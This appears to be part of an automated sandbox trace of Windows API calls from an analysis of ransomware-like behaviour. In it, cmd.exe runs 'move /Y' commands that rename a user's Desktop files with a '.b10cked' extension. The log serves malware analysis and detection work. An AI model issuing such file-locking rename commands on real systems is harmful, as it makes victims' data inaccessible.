(lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\gcAp-7-i61tX.bmp" (normalized: "c:\\users\\eebsym5\\desktop\\gcap-7-i61tx.bmp"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\gcAp-7-i61tX.bmp.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\gcap-7-i61tx.bmp.b10cked"), dwFlags=0x3) returned 1 [0225.644] FindClose (in: hFindFile=0xd0ef8 | out: hFindFile=0xd0ef8) returned 1 [0225.644] _vsnwprintf (in: _Buffer=0x49e25040, _BufferCount=0x103, _Format="%9d", _ArgList=0x2eeb08 | out: _Buffer=" 1") returned 9 [0225.644] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.644] GetFileType (hFile=0x7) returned 0x2 [0225.644] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0225.644] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2eea94 | out: lpMode=0x2eea94) returned 1 [0225.645] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.645] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2eeac8 | out: lpConsoleScreenBufferInfo=0x2eeac8) returned 1 [0225.645] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x49e34640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0225.645] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x49e34640, nSize=0x2000, Arguments=0x2eeb08 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0225.645] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49e34640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x2eeaec, lpReserved=0x0 | out: lpBuffer=0x49e34640*, lpNumberOfCharsWritten=0x2eeaec*=0x1a) returned 1 [0225.646] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.646] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0225.646] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.646] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49e241ac | out: lpMode=0x49e241ac) returned 1 [0225.646] _get_osfhandle (_FileHandle=0) returned 0x3 [0225.646] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49e241b0 | out: lpMode=0x49e241b0) returned 1 [0225.646] SetConsoleInputExeNameW () returned 0x1 [0225.646] GetConsoleOutputCP () returned 0x1b5 [0225.646] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e24260 | out: lpCPInfo=0x49e24260) returned 1 [0225.646] SetThreadUILanguage (LangId=0x0) returned 0x409 [0225.646] exit (_Code=0) Process: id = "593" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16c60" os_pid = "0x55c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\E-AGGM~1.MKV\" \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\e-AggmA P_oioCEdo08.mkv.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 33629 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 33630 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 33631 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 33632 start_va = 0xb0000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 33633 start_va = 0x49e00000 end_va = 0x49e4bfff entry_point = 0x49e00000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 33634 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 33635 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 33636 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 33637 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 33638 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 33813 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 33814 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 33815 start_va = 0x60000 end_va = 0x6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 33816 start_va = 0x1b0000 end_va = 0x216fff entry_point = 0x1b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 33817 start_va = 0x270000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 33818 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 33819 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 33820 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 33821 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 33822 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 33823 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 33824 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 33825 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 33826 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 33827 start_va = 0x370000 end_va = 0x437fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 33828 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 33829 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 33830 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 33831 start_va = 0x70000 end_va = 0x71fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 33832 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 33833 start_va = 0x90000 end_va = 0x90fff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 33834 start_va = 0x440000 end_va = 0x540fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 33835 start_va = 0x550000 end_va = 0x114ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 33836 start_va = 0x1150000 end_va = 0x12b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001150000" filename = "" Thread: id = 817 os_tid = 0xf94 [0225.269] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1af80c | out: lpSystemTimeAsFileTime=0x1af80c*(dwLowDateTime=0xb9d53760, dwHighDateTime=0x1d440a9)) [0225.269] GetCurrentProcessId () returned 0x55c [0225.269] GetCurrentThreadId () returned 0xf94 [0225.269] GetTickCount () returned 0x3e31d [0225.270] QueryPerformanceCounter (in: lpPerformanceCount=0x1af804 | out: lpPerformanceCount=0x1af804*=28205875135) returned 1 [0225.270] GetModuleHandleA (lpModuleName=0x0) returned 0x49e00000 [0225.270] __set_app_type (_Type=0x1) [0225.270] __p__fmode () returned 0x76b331f4 [0225.270] __p__commode () returned 0x76b331fc [0225.271] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49e221a6) returned 0x0 [0225.271] __getmainargs (in: _Argc=0x49e24238, _Argv=0x49e24240, _Env=0x49e2423c, _DoWildCard=0, _StartInfo=0x49e24140 | out: _Argc=0x49e24238, _Argv=0x49e24240, _Env=0x49e2423c) returned 0 [0225.271] GetCurrentThreadId () returned 0xf94 [0225.271] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xf94) returned 0x38 [0225.271] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0225.271] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0225.271] SetThreadUILanguage (LangId=0x0) returned 0x409 [0225.272] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0225.272] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1af79c | out: phkResult=0x1af79c*=0x0) returned 0x2 [0225.272] VirtualQuery (in: lpAddress=0x1af7d3, lpBuffer=0x1af76c, dwLength=0x1c | out: lpBuffer=0x1af76c*(BaseAddress=0x1af000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0225.272] VirtualQuery (in: lpAddress=0xb0000, lpBuffer=0x1af76c, dwLength=0x1c | out: lpBuffer=0x1af76c*(BaseAddress=0xb0000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0225.272] VirtualQuery (in: lpAddress=0xb1000, lpBuffer=0x1af76c, dwLength=0x1c | out: lpBuffer=0x1af76c*(BaseAddress=0xb1000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0225.272] VirtualQuery (in: lpAddress=0xb3000, lpBuffer=0x1af76c, dwLength=0x1c | out: lpBuffer=0x1af76c*(BaseAddress=0xb3000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0225.272] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x1af76c, dwLength=0x1c | out: lpBuffer=0x1af76c*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0225.272] GetConsoleOutputCP () returned 0x1b5 [0225.272] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e24260 | out: lpCPInfo=0x49e24260) returned 1 [0225.272] SetConsoleCtrlHandler (HandlerRoutine=0x49e1e72a, Add=1) returned 1 [0225.272] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.272] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0225.273] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.273] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49e241ac | out: lpMode=0x49e241ac) returned 1 [0225.273] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.273] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0225.273] _get_osfhandle (_FileHandle=0) returned 0x3 [0225.273] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49e241b0 | out: lpMode=0x49e241b0) returned 1 [0225.273] _get_osfhandle (_FileHandle=0) returned 0x3 [0225.273] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0225.273] GetEnvironmentStringsW () returned 0x280198* [0225.274] FreeEnvironmentStringsW (penv=0x280198) returned 1 [0225.274] GetEnvironmentStringsW () returned 0x280198* [0225.274] FreeEnvironmentStringsW (penv=0x280198) returned 1 [0225.274] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ae70c | out: phkResult=0x1ae70c*=0x40) returned 0x0 [0225.274] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ae714, lpData=0x1ae718, lpcbData=0x1ae710*=0x1000 | out: lpType=0x1ae714*=0x0, lpData=0x1ae718*=0xc0, lpcbData=0x1ae710*=0x1000) returned 0x2 [0225.274] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ae714, lpData=0x1ae718, lpcbData=0x1ae710*=0x1000 | out: lpType=0x1ae714*=0x4, lpData=0x1ae718*=0x1, lpcbData=0x1ae710*=0x4) returned 0x0 [0225.274] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ae714, lpData=0x1ae718, lpcbData=0x1ae710*=0x1000 | out: lpType=0x1ae714*=0x0, lpData=0x1ae718*=0x1, lpcbData=0x1ae710*=0x1000) returned 0x2 [0225.274] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ae714, lpData=0x1ae718, lpcbData=0x1ae710*=0x1000 | out: lpType=0x1ae714*=0x4, lpData=0x1ae718*=0x0, lpcbData=0x1ae710*=0x4) returned 0x0 [0225.274] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ae714, lpData=0x1ae718, lpcbData=0x1ae710*=0x1000 | out: lpType=0x1ae714*=0x4, lpData=0x1ae718*=0x40, lpcbData=0x1ae710*=0x4) returned 0x0 [0225.274] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ae714, lpData=0x1ae718, lpcbData=0x1ae710*=0x1000 | out: lpType=0x1ae714*=0x4, lpData=0x1ae718*=0x40, lpcbData=0x1ae710*=0x4) returned 0x0 [0225.274] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ae714, lpData=0x1ae718, lpcbData=0x1ae710*=0x1000 | out: lpType=0x1ae714*=0x0, lpData=0x1ae718*=0x40, lpcbData=0x1ae710*=0x1000) returned 0x2 [0225.274] RegCloseKey (hKey=0x40) returned 0x0 [0225.274] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ae70c | out: phkResult=0x1ae70c*=0x40) returned 0x0 [0225.275] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ae714, lpData=0x1ae718, lpcbData=0x1ae710*=0x1000 | out: lpType=0x1ae714*=0x0, lpData=0x1ae718*=0x40, lpcbData=0x1ae710*=0x1000) returned 0x2 [0225.275] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ae714, lpData=0x1ae718, lpcbData=0x1ae710*=0x1000 | out: lpType=0x1ae714*=0x4, lpData=0x1ae718*=0x1, lpcbData=0x1ae710*=0x4) returned 0x0 [0225.275] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ae714, lpData=0x1ae718, lpcbData=0x1ae710*=0x1000 | out: lpType=0x1ae714*=0x0, lpData=0x1ae718*=0x1, lpcbData=0x1ae710*=0x1000) returned 0x2 [0225.275] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ae714, lpData=0x1ae718, lpcbData=0x1ae710*=0x1000 | out: lpType=0x1ae714*=0x4, lpData=0x1ae718*=0x0, lpcbData=0x1ae710*=0x4) returned 0x0 [0225.275] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ae714, lpData=0x1ae718, lpcbData=0x1ae710*=0x1000 | out: lpType=0x1ae714*=0x4, lpData=0x1ae718*=0x9, lpcbData=0x1ae710*=0x4) returned 0x0 [0225.275] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ae714, lpData=0x1ae718, lpcbData=0x1ae710*=0x1000 | out: lpType=0x1ae714*=0x4, lpData=0x1ae718*=0x9, lpcbData=0x1ae710*=0x4) returned 0x0 [0225.275] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ae714, lpData=0x1ae718, lpcbData=0x1ae710*=0x1000 | out: lpType=0x1ae714*=0x0, lpData=0x1ae718*=0x9, lpcbData=0x1ae710*=0x1000) returned 0x2 [0225.275] RegCloseKey (hKey=0x40) returned 0x0 [0225.275] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863b9 [0225.275] srand (_Seed=0x5b8863b9) [0225.275] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\E-AGGM~1.MKV\" \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\e-AggmA P_oioCEdo08.mkv.b10cked\"" [0225.275] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\E-AGGM~1.MKV\" \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\e-AggmA P_oioCEdo08.mkv.b10cked\"" [0225.275] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49e25260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0225.276] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2818f8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0225.276] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0225.276] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0225.276] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0225.276] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0225.276] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0225.276] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0225.276] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0225.276] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0225.276] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0225.276] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0225.276] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0225.276] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0225.276] GetEnvironmentStringsW () returned 0x2822e8* [0225.277] FreeEnvironmentStringsW (penv=0x2822e8) returned 1 [0225.277] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0225.277] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0225.277] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0225.277] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0225.277] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0225.277] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0225.277] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0225.277] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0225.277] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0225.277] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0225.277] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1af4d8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0225.277] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1af4d8, lpFilePart=0x1af4d4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1af4d4*="Desktop") returned 0x18 [0225.277] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0225.277] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1af254 | out: lpFindFileData=0x1af254) returned 0x280028 [0225.277] FindClose (in: hFindFile=0x280028 | out: hFindFile=0x280028) returned 1 [0225.278] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1af254 | out: lpFindFileData=0x1af254) returned 0x280028 [0225.278] FindClose (in: hFindFile=0x280028 | out: hFindFile=0x280028) returned 1 [0225.278] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1af254 | out: lpFindFileData=0x1af254) returned 0x280028 [0225.278] FindClose (in: hFindFile=0x280028 | out: hFindFile=0x280028) returned 1 [0225.278] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0225.278] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0225.278] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0225.278] GetEnvironmentStringsW () returned 0x282b08* [0225.278] FreeEnvironmentStringsW (penv=0x282b08) returned 1 [0225.278] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49e25260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0225.279] GetConsoleOutputCP () returned 0x1b5 [0225.279] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e24260 | out: lpCPInfo=0x49e24260) returned 1 [0225.279] GetUserDefaultLCID () returned 0x409 [0225.280] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49e24950, cchData=8 | out: lpLCData=":") returned 2 [0225.280] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1af618, cchData=128 | out: lpLCData="0") returned 2 [0225.280] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1af618, cchData=128 | out: lpLCData="0") returned 2 [0225.280] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1af618, cchData=128 | out: lpLCData="1") returned 2 [0225.280] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49e24940, cchData=8 | out: lpLCData="/") returned 2 [0225.280] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49e24d80, cchData=32 | out: lpLCData="Mon") returned 4 [0225.280] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49e24d40, cchData=32 | out: lpLCData="Tue") returned 4 [0225.280] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49e24d00, cchData=32 | out: lpLCData="Wed") returned 4 [0225.280] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49e24cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0225.280] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49e24c80, cchData=32 | out: lpLCData="Fri") returned 4 [0225.280] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49e24c40, cchData=32 | out: lpLCData="Sat") returned 4 [0225.280] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49e24c00, cchData=32 | out: lpLCData="Sun") returned 4 [0225.280] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49e24930, cchData=8 | out: lpLCData=".") returned 2 [0225.280] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49e24920, cchData=8 | out: lpLCData=",") returned 2 [0225.280] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0225.281] GetConsoleTitleW (in: lpConsoleTitle=0x2708f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0225.282] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0225.282] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0225.282] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0225.282] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0225.283] _wcsicmp (_String1="move", _String2=")") returned 68 [0225.283] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0225.283] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0225.283] _wcsicmp (_String1="IF", _String2="move") returned -4 [0225.283] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0225.283] _wcsicmp (_String1="REM", _String2="move") returned 5 [0225.283] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0225.286] GetConsoleTitleW (in: lpConsoleTitle=0x1af310, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0225.411] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0225.411] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0225.411] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0225.411] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0225.411] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0225.411] _wcsicmp (_String1="move", _String2="CD") returned 10 [0225.411] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0225.411] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0225.411] _wcsicmp (_String1="move", _String2="REN") returned -5 [0225.411] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0225.411] _wcsicmp (_String1="move", _String2="SET") returned -6 [0225.411] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0225.411] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0225.411] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0225.411] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0225.411] _wcsicmp (_String1="move", _String2="MD") returned 11 [0225.411] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0225.411] _wcsicmp (_String1="move", _String2="RD") returned -5 [0225.411] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0225.411] 